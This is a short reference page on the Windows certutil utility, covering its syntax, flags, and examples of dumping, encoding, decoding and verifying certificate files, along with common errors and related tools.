CERTUTIL - CMD

Overview

certutil is a command-line utility in Windows that is used to manage certificates, Certificate Revocation Lists (CRLs), and Certificate Trust Lists (CTLs) on Windows computers. It offers a versatile set of features for creating, deleting, and viewing certificates and their related data. Primarily used in environments where security is a concern, it helps in handling tasks related to certificates in various formats, verifying the integrity and status of certificates, and troubleshooting certificate-related issues.

Syntax

certutil [Options] [Command] [Command_Arguments]
  • Options: These modify how the certutil behaves generally (e.g., -config – specifies the configuration string).
  • Command: What you want certutil to perform, like -dump, -encode, -restore.
  • Command_Arguments: Additional arguments specific to the command chosen.

Options/Flags

  • -dump: Displays detailed information about a certificate, CRL, or a CTL file.
  • -encode: Encodes a file to a Base64 format.
  • -decode: Decodes a Base64-encoded file.
  • -urlcache: Displays or deletes URL cache entries.
  • -config: Specifies a configuration string for the target Certificate Authority.
  • -v: Verbose mode, gives detailed output for the operation being performed.
  • -silent: Runs the utility without prompting for user input (useful in scripts).

Examples

  1. Displaying Certificate Information:
certutil -dump myCertificate.cer

This command prints detailed information about the certificate myCertificate.cer.

  1. Encoding and Decoding a Certificate:
certutil -encode input.cer encoded.txt
certutil -decode encoded.txt output.cer

The first command encodes the certificate file to a Base64 text file, while the second command decodes it back.

  1. Verifying a Certificate:
certutil -verify myCertificate.cer

This command checks the integrity and validity of myCertificate.cer.

Common Issues

  • Permission Errors: Running certutil might require administrative rights especially when making changes to system certificates.
  • Syntax Errors: As there are numerous flags and variations, incorrect flag usage or order can result in errors. Always refer to the syntax and options correctly.
  • Compatibility Issues: When dealing with certificates from or for non-Windows entities, format incompatibilities may arise. Ensure formats are supported and correctly specified.

Integration

You can combine certutil with other CMD utilities like findstr to search for specific certificate details:

certutil -store my | findstr /C:"CN=example.com"

This combination searches for certificates issued to “example.com” in the local store.

  • openssl: Often used alongside or as an alternative to certutil for certificate management on Windows and other OS.
  • makecert: Deprecated Windows SDK tool for generating test certificates.
  • powershell: CMD’s successor, PowerShell, provides different cmdlets like New-SelfSignedCertificate for similar tasks.

For more detailed information and updates, refer to the official Certutil documentation.